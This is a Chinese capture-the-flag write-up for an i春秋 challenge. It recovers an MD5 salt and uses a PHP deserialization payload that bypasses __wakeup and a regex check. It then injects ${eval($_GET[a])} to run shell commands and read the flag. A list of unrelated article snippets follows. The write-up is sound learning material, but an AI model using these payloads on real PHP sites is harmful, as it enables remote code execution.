i春秋-Hash(__wakeup沉默、序列化)

练习平台地址

竞赛中心

题目描述

题目内容

 啥也没有就一个标签跳转

 点击后的确发生了跳转

观察到url中有key和hash两个值,猜测hash是key的hash

 查看源代码发现确实是

 $hash=md5($sign.$key);the length of $sign is 8

解密得到$sign应该为kkkkkk01

构造122的hash

import hashlib# 要加密的原始字符串
data = "kkkkkk01122"# 创建MD5对象
md5_object = hashlib.md5()# 更新要加密的数据,注意这里如果数据是字符串需要先编码成字节类型,通常使用utf-8编码
md5_object.update(data.encode('utf-8'))# 获取十六进制表示的MD5哈希值
hash_value = md5_object.hexdigest()print(hash_value)

e1ebb04a0a78afe23e2d542e72a25005

传值

访问Gu3ss_m3_h2h2.php

代码分析

1.the secret is in the f15g_1s_here.php,flag在这个文件中

2.通过get接收var参数,base64后进行一个正则匹配——"/[oc]:\d+:/i"是一个忽略大小写的正则表达式,用于匹配以 “o” 或 “c” 开头,接着是冒号、一个或多个数字以及再一个冒号的格式的字符串,不满足条件程序结束,满足则反序列化var参数

解题思路

1.修改file属性为f15g_1s_here.php,序列化对象
2.修改属性数目(沉默__wakeup)
3.替换‘O:4’为‘O:+4’
4.base_64编码 

脚本如下

<?php
class Demo
{private $file = 'f15g_1s_here.php';
}$x = new Demo;
$c = serialize($x);
$c = str_replace('O:4','O:+4',$c);
$c = str_replace(':1:',':2:',$c);
$d = base64_encode($c);
echo ($d);

 TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==

传值

 得到f15g_1s_here.php的源码

<?php
if (isset($_GET['val'])) {$val = $_GET['val'];eval('$value="' . addslashes($val) . '";');
} else {die('hahaha!');
}

代码分析

通过get接收一个val参数,通过addslashes对val进行转义

存在eval函数可以命令执行,这里使用变量绕过addslashes转义

payload构造

val = ${eval(echo `ls`;)}
#ls反引号括住


val=${eval($_GET[a])}&a=echo `ls`; 

访问 f15g_1s_here.php并传参

成功执行命令

 查看flag

flag

flag{a8b481b7-8f12-44ce-8b87-bb561afc61ba}

注意事项

1.传参建议在HackBar中传,不要直接在url中编辑

2.解密不要自己编写脚本碰撞,要在somd5.com上直接查询

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/17987.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

【含开题报告+文档+PPT+源码】基于SpringBoot+Vue的智能蒙绮英语学习系统设计与实现

开题报告 随着全球化的不断深入&#xff0c;英语作为国际通用语言&#xff0c;其重要性日益凸显。掌握英语不仅可以拓宽个人的视野和知识面&#xff0c;还可以增强个人竞争力&#xff0c;为个人职业发展带来更多机会。因此&#xff0c;开发一款能够帮助用户更高效地学习英文单…

Blender vs 3dMax谁才是3D软件的未来?

在探讨Blender与3ds Max谁才是3D软件的未来时&#xff0c;我们需要从多个维度对这两款软件进行详细分析。 Blender的优势 开源免费&#xff1a;Blender是一款完全免费的开源3D创作套件&#xff0c;这使得它成为独立艺术家、业余爱好者和小型工作室的首选。用户无需承担巨额的…

ubuntu安装cuda、cudnn和TensoRT【分步安装】

我说实话&#xff0c;这个环境安装真的要了老命&#xff0c;太tm恶心了。 因为遇到了很多问题&#xff0c;非常之恶心 问题一&#xff1a;版本对应 问题二&#xff1a;下载具慢 问题三&#xff1a;上NVIDIA有时候上不去 问题四&#xff1a;找到对应版本点不了 问题五&…

基于树莓派的边缘端 AI 目标检测、目标跟踪、姿态估计 视频分析推理 加速方案:Hailo with ultralytics YOLOv8 YOLOv11

文件大纲 加速原理硬件安装软件安装基本设置系统升级docker 方案Demo 测试目标检测姿态估计视频分析参考文献前序树莓派文章hailo加速原理 Hailo 发布的 Raspberry Pi AI kit 加速原理,有几篇文章介绍的不错 https://ubuntu.com/blog/hackers-guide-to-the-raspberry-pi-ai-ki…

网络工程实验一:静态路由的配置

#实验仅供参考&#xff0c;勿直接粘贴复制&#xff0c;用以学习交流# 1、实验目的&#xff1a; 熟悉eNSP网络仿真工具平台。 掌握静态路由配置方法。 能够配置路由器接口地址。 2、实验内容&#xff1a; 2.1、安装对应的软件&#xff1a; &#xff08;1&#xff09;Virtual …

基于java的宠物用品交易平台

一、作品包含 源码数据库设计文档万字PPT全套环境和工具资源部署教程 二、项目技术 前端技术&#xff1a;Html、Css、Js、Vue、Element-ui 数据库&#xff1a;MySQL 后端技术&#xff1a;Java、Spring Boot、MyBatis 三、运行环境 开发工具&#xff1a;IDEA/eclipse 数据…

华为VPN技术

1.启动设备 2.配置IP地址 [FW1]int g1/0/0 [FW1-GigabitEthernet1/0/0]ip add 192.168.1.254 24 [FW1-GigabitEthernet1/0/0]int g1/0/1 [FW1-GigabitEthernet1/0/1]ip add 100.1.1.1 24 [FW1-GigabitEthernet1/0/1]service-manage ping permit [FW2]int g1/0/0 [FW2-Gi…

鸿蒙进阶篇-数组常用方法(一)

大家好&#xff0c;这里是鸿蒙开天组&#xff0c;今天咱们来学习一下数组的常用方法。 数组在编程中是非常常见的数据类型&#xff0c;毕竟需要用到的场合太多了&#xff0c;所以我们今天来使劲学习一下常用方法&#xff0c;在这里也没法一一列全&#xff0c;但是大家也可以根…

整数唯一分解定理

整数唯一分解定理&#xff0c;也称为算术基本定理&#xff0c;是由德国数学家高斯在其著作《算术研究》中首次提出的。本文回顾整数唯一分解定理以及对应的几个重要结论。 一、整数唯一分解定理 整数唯一分解定理&#xff0c;也称为算术基本定理&#xff0c;是数论中的一个重…

对Pod做一个详细了解

文章目录 01创建一个pod02删除pod03镜像拉取策略04pod的标签05pod资源限制方法06pod的重启策略 07pod中运行多个容器08对pod内的容器执行命令09 验证多个pod中多个容器网络共享10 pod的创建流程和调度的约束方式pod的声明周期介绍pod 的健康检查健康检查的方式probe的探测方式案…

LinkedHashMap实现LRU

LRU 环境&#xff1a;JDK11 最近接触LRU(Least Recently Used)&#xff0c;即最近最少使用&#xff0c;也称淘汰算法&#xff0c;在JDK中LinkedHashMap有相关实现 LRU的LinkedHashMap实现 LinkedHashMap继承HashMap。所以内存的存储结构和HashMap一样&#xff0c;但是LinkedH…

基于rk356x u-boot版本功能分析及编译相关(三)Makefile分析

🎏技术驱动源于热爱,祝各位学有所成。 文章目录 一、Makefile简要概述二、简要流程图三、Makefile文件具体分析大家好哈,这次因工作比较忙,文章更新拖的有些久了。哈哈,话不多说,咱们接着上次继续说u-boot的Makefile。 一、Makefile简要概述 一般要了解u-boot源码的编译…

shell(1)脚本创建执行与变量使用

shell&#xff08;1&#xff09;脚本创建执行与变量使用 声明&#xff01; 学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下&#xff0c;如涉及侵权马上删除文章 笔记只是方便各位师傅的学习和探讨&#xff0c;文章所提到的网站以及内容&#xff0c;只做学习交流&…

第5章总体设计-5.4 硬件可行性分析

5.4 硬件可行性分析 5.4.1 硬件方案评估1. 框式产品硬件可行性分析&#xff08;1&#xff09;机框设计可行性。&#xff08;2&#xff09;单板设计可行性。&#xff08;3&#xff09;核心功能器件选型。&#xff08;4&#xff09;数据流。 2. 盒式产品硬件可行性分析3. 终端产品…

TOIS24|推荐公平性的反事实解释

论文&#xff1a;https://arxiv.org/pdf/2307.04386 代码&#xff1a;https://anonymous.4open.science/r/CFairER-anony/. 关键词&#xff1a;可解释推荐;公平;反事实的解释;强化学习 1 动机 现有推荐系统存在的公平性问题&#xff0c;例如性别歧视和种族偏见等&#xff0c;…

week 3 - Assembly Language

Important Instructions and Syntax 此内容是以MASM编写的&#xff0c;你将使用Visual C/C内联汇编来编程&#xff0c;因此数据元素的声明有所不同&#xff0c;但概念和指令集&#xff08;instruction sets)相同。 一、General-Purpose Registers 寄存器是CPU内的命名存储单元…

6.C操作符详解,深入探索操作符与字符串处理

C操作符详解&#xff0c;深入探索操作符与字符串处理 C语言往期系列文章目录 往期回顾&#xff1a; C语言是什么&#xff1f;编程界的‘常青树’&#xff0c;它的辉煌你不可不知VS 2022 社区版C语言的安装教程&#xff0c;不要再卡在下载0B/s啦C语言入门&#xff1a;解锁基础…

校园导航系统

关于数据结构的一个整理&#xff1a; 1、链式有序表的合并 2、栈 3、队列 4、二叉树、哈夫曼报文 5、图论 6、十大排序 7、校园导航系统 文章目录 校园导航系统演示示例代码示例1、弧结点和顶点节点2、Map节点3、用户 校园导航系统 采用C语言涉及了数据库相关的操作&am…

食品进出库库存管理发货开单软件下载 佳易王食品进出库管理系统操作教程

一、概述 【软件资源下载在文章最后】 食品进出库库存管理发货开单软件下载 食品进出库管理系统操作教程 商品进出库管理软件是一款操作简便的进出库管理软件&#xff0c;管理入库&#xff0c;出库&#xff0c;库存&#xff0c;同时打印发货单。 二、软件操作教程 第一步&a…